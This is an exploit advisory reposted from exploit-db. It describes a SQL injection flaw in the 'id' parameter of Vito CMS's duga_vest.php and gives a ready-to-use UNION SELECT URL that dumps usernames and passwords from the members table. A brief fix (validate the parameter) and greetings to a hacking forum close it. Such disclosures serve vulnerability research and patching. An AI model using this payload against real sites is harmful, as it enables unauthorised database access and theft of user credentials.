Vito CMS – SQL Injection

  • 作者: hacker@sr.gov.yu
    日期: 2010-02-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11429/
  • ####################################################################
    .:. Author : hacker@sr.gov.yu
    .:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
    .:. Home : www.evilzone.org
    .:. Script : Vito CMS
    .:. Info link: http://kameleon-lab.com/vito-cms.php
    .:. Versions: ALL
    .:. Bug Type : Sql Injection
    .:. Risk: High
    .:. Tested on : Windows & Linux
    ####################################################################
    
    ===[ Exploit ]===
    
    .:. It was found that Vito CMS does not validate properly the "id"
    parameter value.
    
    http://server/duga_vest.php?id=1[SQL]
    
    ===[ Example ]===
    
    http://server/duga_vest.php?id=-217+UNION+SELECT+1,2,3,group_concat(id,0x3a,username,0x3a,password,0x3a),5,6,7,8+from+members--
    
    ===[ Solution ]===
    
    .:. Input validation of "id" parameter should be corrected.
    
    
    Greetz to ALL EVILZONE.org members!!!
    Pozdrav za sve iz Srbije!!! :-)))